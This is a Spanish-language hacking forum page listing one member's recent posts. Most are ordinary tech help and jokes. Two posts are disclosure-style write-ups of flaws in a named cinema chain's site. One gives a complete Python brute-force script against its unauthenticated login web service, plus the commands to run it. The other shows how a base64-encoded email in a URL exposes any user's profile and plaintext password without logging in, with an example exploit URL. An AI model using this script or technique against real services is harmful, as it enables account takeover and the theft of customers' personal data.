This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Messages - DtxdF

Pages: [1] 2 3 ... 54
1
Batch - Bash / Re: [BASH] BATS - Testing framework para bash
« on: January 27, 2022, 03:29:10 am »
Ojalá lo fuera conocido antes, aunque mejor tarde que nunca. Muchas gracias por el aporte @tt0ne'

~ DtxdF

2
Dudas y pedidos generales / Re: ayuda app geolocalizar con movil
« on: January 25, 2022, 11:36:25 pm »
@topgun1964

Indaga sobre Encontrar mi dispositivo, de Google.

Enlace: You are not allowed to view links. Register or Login

~ DtxdF

3
@AXCESS

¡Diablo! Amo las comedias contra los políticos.

~ DtxdF

4
Dudas y pedidos generales / Re: ¿Como descargar Cursos de Udemy?
« on: January 18, 2022, 10:54:19 am »
He escuchado maravillas de udemy-dl:

*.- You are not allowed to view links. Register or Login

~ DtxdF

5
Dudas y pedidos generales / Re: Ayuda con Batch de Copiado
« on: January 17, 2022, 02:11:38 pm »
Aquí no realizamos tareas, pero si tienes un adelanto, estoy seguro que te apoyarán con la cuestión.

~ DtxdF

6
Dudas y pedidos generales / Re: De Windows 10 a Ubuntu
« on: January 17, 2022, 02:10:13 pm »
No bajará el rendimiento de tu PC por tener dos o más sistemas operativos instalados. Lo único que sí podría tardar el temporizador que mayormente te brindan los cargadores de arranque, lo cual es posible configurarlos según la conveniencia.

~ DtxdF

7
Si estás en Windows:

Code: (bash) You are not allowed to view links. Register or Login
ping -a a.b.c.d
Donde a.b.c.d es la dirección IP. Si estás en un sistema tipo unix:

Code: (bash) You are not allowed to view links. Register or Login
host a.b.c.d
Todo es relativo al servidor DNS. También puedes ir al router, ver los clientes gracias al DHCP y mayormente se pueden ver los nombres de host.

Además que nmap tiene la cualidad antes descrita, lee su manual que es muy rico, hasta en español existe.

~ DtxdF

8
Hacking / Re: Artículo Teclado Diabolico.
« on: January 09, 2022, 03:36:00 am »
Muy bueno el artículo con una excelente prueba de concepto.

~ DtxdF

9
Underc0de / Re: Feliz Año Nuevo!!!
« on: December 31, 2021, 11:51:29 pm »
@AXCESS

Me confirmará que popota le convirtió en nigromante en el 2021, no lo puede negar. No se preocupe porque este 2022 también se dispondrá de la alquimia para combatir los ataques terrenales de la Caniche y su sequito.

@noxonsoftwares

Usted sabe de lo que hablo.

#Aristogatos2022


¡Feliz años a todos los underc0ders!

~ DtxdF

10
You are not allowed to view links. Register or Login
Del mismo modo el “sacar” (calcular) el algoritmo con que se establece la secuencia numérica si procede. @ANTRAX tiene una anécdota sobre una apuesta en un bar con unos amigos, en que uno de ellos ya sabía calcular el algoritmo de los modelos de router que había en el local.

Si me memoria cumplió con lo que le pedí, sería el siguiente el artículo que se mencionó:

*.- underc0de.org/foro/wireless/hackeando-redes-wifi-en-2-minutos!

~ DtxdF

11
@V4K1

No se lo tome personal. Es mejor estar informado a tiempo que demasiado tarde. Tengalo presente como una ventaja.

~ DtxdF

12
Dudas y pedidos generales / Re: Información
« on: December 24, 2021, 01:43:24 am »
Hola @Lucca2023

Hay muchas formas de subir una página web, y tener un dominio personalizado. No te diré el cómo, porque es un desperdicio no indicarte los numerosos artículos que te brinda la web, pero lo que sí te regalaré son las palabras y los vagos consejos.

Hay varias maneras en las que te es permitido subir tu página web, siendo las más atractivas las siguientes:

*.- VPS;
*.- Hosting;
*.- Tu propio servidor.

Te comparto los siguientes artículos:

*.- You are not allowed to view links. Register or Login
*.- You are not allowed to view links. Register or Login

Algunos servicios recomendados:

*.- You are not allowed to view links. Register or Login
*.- You are not allowed to view links. Register or Login

La decisión que se tomará será vital, y dependerá de varios factores. El presupuesto, y los conocimientos que se tengan, además de los requerimientos.

~ DtxdF

13
@agutierrez

No sé qué verifica la página en cuestión. También la página me es desconocida. Suponiendo, la entrada a la función es lo incorrecto, ya que la función espera que al usar determinado número (que en este caso es de 0 a 9), dé un resultado correcto. Lo que pasa es que el for le estás sumando uno al argumento. Creo que la página entonces desearía que fuera la función, que al pasarle determinado número, dé determinado valor, sin necesidad de más nada.

Code: (python) You are not allowed to view links. Register or Login
#!/usr/local/bin/python3.8

def factorial(n):
        r = abs(n)

        if (r == 0):
                return 1

        result = factorial(r-1)*r

        if (n < 0):
                result = result * -1
        return result

if __name__ == "__main__":
        for n in range(0, 9):
                print(n, factorial(n))

~ DtxdF

14
@AXCESS

Santa Claus le da doble regalos a los gatos. Que quede en evidencia lo siguiente:


~ DtxdF

15
Gracias @AXCESS y @DanEnd por leer el artículo ^^

La vulnerabilidad es peor no solo por lo que se puede hacer, sino lo fácil que es. Es lo que me sorprendió siendo una empresa tan grande, y con tanto dinero y poder. Pero lo cierto es que muchas empresas aquí se le parecen en muchos aspectos, al menos en las tecnologías que utilizan, entonces el vector se puede ampliar a un patrón.

Quote
Por qué lo puso en Noticias si esto es Hacking puro?

Fue mi primer razonamiento, pero creo que es un poco diferente a un how-to, un tutorial, o un artículo que muestre o demuestre una herramienta nueva, un protocolo, un código, sino más bien informar al lector lo que está pasando con esta y quizá muchas otras empresas.

~ DtxdF

16
Hace muy poco se You are not allowed to view links. Register or Login, la cual presentaba una vulnerabilidad más sencilla de explotar que la que se presentará en este artículo, pero no por ello menos grave.


Cines Unidos es creador de su propio Web Service, y parece que muy viejo es, ya que está o estaba pensado para soportar a Blackberry, que en sus tiempos fue un gran teléfono para muchos; pero hoy en día solo puede ser un agujero de seguridad, siendo éste un sistema heredado. Aunque es indiferente, ya que se puede soportar perfectamente una plataforma vieja, sin descuidar la seguridad, y sin por lo menos tener autenticación, de la cual carece.


Ingresando a 'You are not allowed to view links. Register or Login' es posible observar las funciones de las cual nos convida.


Aunque todas sean interesantes, las que me motivaron a redactar este modesto artículo son dos: Login y RegisterUser; siendo la primera la que protagonizará esta obra.

Resulta que Cines Unidos tiene un captcha en el registro y un molesto aviso en el de inicio de sesión el cual nos informa cuando cometemos un error en nuestras credenciales. Todo esto nos hace perder muchísimo tiempo siendo un atacante en este escenario. ¿Qué tal si usamos el Web Service para bypasear todo esto y ahorrar tiempo?


Code: (python) You are not allowed to view links. Register or Login
#!/usr/local/bin/python3.7

import zeep

WS_URL = "http://ws.cinesunidos.com/blackberry.asmx?wsdl"

def get_instance():
return zeep.Client(
WS_URL
)

def ws_login(username, password):
ws = get_instance()

return ws.service.Login(
username, password
)

def main():
import argparse

parser = argparse.ArgumentParser(description="Brute-force attack to ws.cinesunidos.com/blackberry.asmx")
parser.add_argument("-u", "--username", help="The username", required=True)
parser.add_argument("-w", "--wordlist", help="The wordlist to use", required=True, type=argparse.FileType("r", encoding="utf-8"))
parser.add_argument("-i", "--show-user-information", help="Show user information", action="store_true")

args = parser.parse_args()
username = args.username
wordlist = args.wordlist
show_info = args.show_user_information

for password in wordlist:
# Remove new line
password = password.strip()

response = ws_login(username, password)

if (response["Status"]):
print(f"[+] Password found: {password}")

if (show_info):
user_info = response.User

print("User information:")
print("################")
print("Birthdate:", f"{user_info.Birthdate}")
print("Sex:", f"{user_info.Sex}")
print("Login:", f"{user_info.Login}")
print("Name:", f"{user_info.Name}")
print("LastName:", f"{user_info.LastName}")
print("Phone:", f"{user_info.Phone}")
print("SecureId:", f"{user_info.SecureId}")
print("ExternalId:", f"{user_info.ExternalId}")
break
else:
print(f"[-] The '{password}' is incorrect...")

if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
pass

Un script es lo que se necesita para realizar esto. Un script que automatice, que sea nuestra herramienta, o nuestra arma. Su uso, por suerte, es demasiado sencillo, y tan solo depende de una librería:

Code: (bash) You are not allowed to view links. Register or Login
pip install zeep
Los únicos parámetros que debemos memorizar, son tres: -u, el nombre de usuario; -w, la lista de contraseñas; y por último, además que es opcional, pero muy útil, -i que muestra la información de usuario. Agrupando esta breve explicación, podríamos realizar la siguiente secuencia:

Code: (bash) You are not allowed to view links. Register or Login
python3.7 bruteforce.py -u [email protected] -w wordlist.lst -i
*.- [email protected]: la dirección de correo electrónico objetivo;
*.- wordlist.lst: la lista de palabras que se usarán como contraseñas, línea por línea.

Claro, que nos faltaría una cosa muy relevante: la lista de contraseñas. Es arbitraria, pero para esta Prueba de Concepto, se usará el clásico crunch:


Code: (bash) You are not allowed to view links. Register or Login
crunch 1 5 12345abc > wordlist.lst
Y como soy víctima y atacante en este escenario, introduzco intencionalmente la contraseña que conozco en cualquier línea que desee. Acto seguido: realizamos nuestro pequeño ataque.


Feliz navidad.

~ DtxdF

17
Cines Unidos es una cadena de cines de Venezuela fundada el 13 de Junio de 1947. Actualmente se encuentra en 11 ciudades y cuenta con 198 salas en 24 complejos. La empresa además de su principal negocio, distribuye películas a nivel nacional.


Pese a no ser muy fanático de Marvel o de sus superhéroes, Spider-Man: No Way Home es una película que sin duda alguna está de moda, y genera interés hacia los cercanos a mí. Mi persona, un tanto curiosa, observó algo muy interesente que hoy día comparto. Un amigo, que no diré el nombre, entró en su cuenta de Cines Unidos a través de la misma página web como un día común y corriente, pero lo interesante de esto, es la URL...


El parámetro GET llamado hash, fue mi motivación inicial. Este parámetro, con su nombre tan evidente, me hizo saber que era un identificador. No cualquier identificador, ya que si observamos no nos dice nada a simple vista su valor. Pero si nos vamos a nuestro terminal:


¡Es el correo electrónico! Claro, que para los desarrolladores codificarlo a base64 fuera sido mejor...

Hasta aquí nada sorprendente de lo que ya hemos descubierto: un simple identificador y nada más. Ofuscado y nada más. Pero, no quise quedarme con esos simples datos, ya que mi intuición me decía que había algo más, algo no tan evidente.



Cierro sesión. Reflexiono con los datos que adquirí, y comienzo a realizar varias hipótesis. La primera, y más evidente, y la que éxito tuve, fue decir a mis adentros: ¿si la dirección de correo electrónico es el identificador de la persona codificado a base64, alguien que no esté registrado podría igualmente ver los datos de esa persona? Sigamos para ver el desenlace.

Así que, como si fuera soldado y general a la vez, prosigo a darme ordenes y cumplirlas, las cuales son sencillas:

*.- Adquirir un correo electrónico de la víctima;
*.- Codificarlo a base64;
*.- Usar la misma URL, que por decirlo de otra manera es el exploit, y verificar mi teorema.



El resultado ahora sería:

Code: You are not allowed to view links. Register or Login
https://www.cinesunidos.com/Mi_Cuenta/UpdateUser?hash=a2xlcnh0dXpAc2hhcmtsYXNlcnMuY29t
Al ingresar:


Es sencillo observar que ya estoy en el formulario para actualizar la información del usuario. Y como un plus, se puede observar que no he iniciado sesión. El sistema cree que no he ingresado con mis credenciales, porque efectivamente no fue así. ¡El sistema no necesita que un usuario ingrese sus credenciales para poder ver su información!

Algo más peculiar, pero no dotado de seguridad, es el módulo Contraseña que le permite al usuario cambiar su contraseña según que le plazca. Yo, como atacante y también víctima en este escenario, deseo observar las credenciales del usuario para acceder a posteriori como un usuario legitimo. Presionamos CTRL-U para ver el código fuente, seguido de CTRL-F para buscar algún patrón, y luego buscamos lo siguiente id="Password".



Vemos el atributo value que nos hace coto a nuestra búsqueda del tesoro. El atacante ahora conoce la dirección de correo electrónico y la contraseña. ¿Qué sigue? Acceder como un usuario legitimo...


¡Voilá! Ya hemos accedido como un usuario legitimo para el sistema.


Conclusión

Hemos observado en este modesto artículo que Cines Unidos es inseguro. Un atacante legitimo puede adquirir fácilmente una lista de direcciones de correo electrónico y luego ir probando uno a uno, quizá con un script, quizá manual. El atacante además puede obtener información que puede resultar sensible, como el nombre completo de la persona, la cédula de identidad, la dirección, y puede que lo peor de todo, la contraseña, que como sabemos, los usuarios comunes mayormente usan la misma contraseña para diferentes servicios.

Esperemos arreglen pronto esta vulnerabilidad, pero queda en el aire una interrogante más: ¿habrá una más o quizá peor que esta?.


~ DtxdF

18
Dudas y pedidos generales / Re: Gerga
« on: December 14, 2021, 11:18:31 pm »
@V4K1

Para darle más peso a lo que relata @AXCESS, puede fijarse que la mayoría de moderadores de este foro son, en efecto, gatos. No se deje engañar por caniches, ni otros cuentos.

~ DtxdF

19
Seguridad / Re: ¿Como borrar un disco duro definitivamente?
« on: December 14, 2021, 07:52:53 pm »
@V4K1

No es para el pingüino solamente, para cualquier unix-like es posible. No obstante, un sistema operativo/distribución que permita su uso en vivo, te dará la posibilidad de realizar esto. Aunque la técnica es la misma (zero-filling, aunque aquí, en vez de zeros, usamos bytes generados de forma aleatoria): You are not allowed to view links. Register or Login

Nota: no quiere decir que esto ayude a evitar el desuso de cifrado en disco, que combinado, haría más infalible esta técnica que no necesariamente te puede proteger en todos los casos.

~ DtxdF

20
Dudas y pedidos generales / Re: Doxxing
« on: December 14, 2021, 12:12:49 am »
@V4K1

Lo siento, nadie que sepa, o por lo menos que se haya manifestado sabe hacer eso, que de paso es ilegal. Pero te aconsejo que hables con el proveedor de tu hosting para que mitigue ese ataque. O que indagues sobre cloudflare.

~ DtxdF

Pages: [1] 2 3 ... 54